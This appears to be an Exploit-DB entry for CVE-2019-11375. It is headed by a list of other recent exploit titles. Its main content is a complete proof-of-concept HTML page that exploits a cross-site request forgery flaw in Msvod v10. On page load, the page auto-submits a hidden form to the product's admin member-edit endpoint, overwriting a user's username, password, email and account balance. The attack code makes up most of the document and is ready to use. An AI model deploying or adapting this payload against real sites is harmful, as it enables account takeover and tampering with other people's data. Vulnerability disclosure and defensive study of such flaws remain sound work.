
10 changes to exploits/shellcodes Ease Audio Converter 5.30 - '.mp4' Denial of Service (PoC) QNAP myQNAPcloud Connect 1.3.4.0317 - 'Username/Password' Denial of Service Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-Memory in Invalid Table Size Denial of Service (PoC) LabF nfsAxe 3.7 Ping Client - 'Host IP' Buffer Overflow (Direct Ret) ManageEngine Applications Manager 14.0 - Authentication Bypass / Remote Command Execution (Metasploit) WordPress Plugin Contact Form Builder 1.0.67 - Cross-Site Request Forgery / Local File Inclusion 74CMS 5.0.1 - Cross-Site Request Forgery (Add New Admin User) Msvod 10 - Cross-Site Request Forgery (Change User Information) UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting Linux/ARM - Password-Protected Reverse TCP Shellcode (100 bytes)
68 lines
No EOL
1.4 KiB
HTML
68 lines
No EOL
1.4 KiB
HTML
# Exploit Title: Msvod v10 has a CSRF vulnerability to change user information
|
|
|
|
# Date: 2019-04-14
|
|
# Exploit Author: ax8
|
|
# Vendor Homepage: https://github.com/Li-Siyuan
|
|
# Software Link: https://www.msvodx.com/
|
|
# Version: v10
|
|
# CVE : CVE-2019-11375
|
|
|
|
|
|
|
|
Msvod v10 has a CSRF vulnerability to change user information via the admin/member/edit.html URI.
|
|
|
|
|
|
|
|
<!--poc.html(change user infomation)-->
|
|
|
|
<!DOCTYPE html>
|
|
|
|
<html>
|
|
|
|
<head>
|
|
|
|
<title> CSRF Proof</title>
|
|
|
|
<script type="text/javascript">
|
|
|
|
function exec1(){
|
|
|
|
document.getElementById('form1').submit();
|
|
|
|
}
|
|
|
|
</script>
|
|
|
|
</head>
|
|
|
|
<body onload="exec1();">
|
|
|
|
<form id="form1" action="http://a.msvodx.cn/admin/member/edit.html" method="POST">
|
|
|
|
<input type="hidden" name="username" value="hacker1" />
|
|
|
|
<input type="hidden" name="nickname" value="hacker1" />
|
|
|
|
<input type="hidden" name="email" value="hacker1" />
|
|
|
|
<input type="hidden" name="tel" value="hacker1" />
|
|
|
|
<input type="hidden" name="password" value="hacker1" />
|
|
|
|
<input type="hidden" name="out_time" value="1970-01-01" />
|
|
|
|
<input type="hidden" name="money" value="30" />
|
|
|
|
<input type="hidden" name="is_permanent" value="0" />
|
|
|
|
<input type="hidden" name="status" value="1" />
|
|
|
|
<input type="hidden" name="id" value="821" />
|
|
|
|
</form>
|
|
|
|
</body>
|
|
|
|
</html>
|
|
|
|
MISC:http://www.iwantacve.cn/index.php/archives/198/ |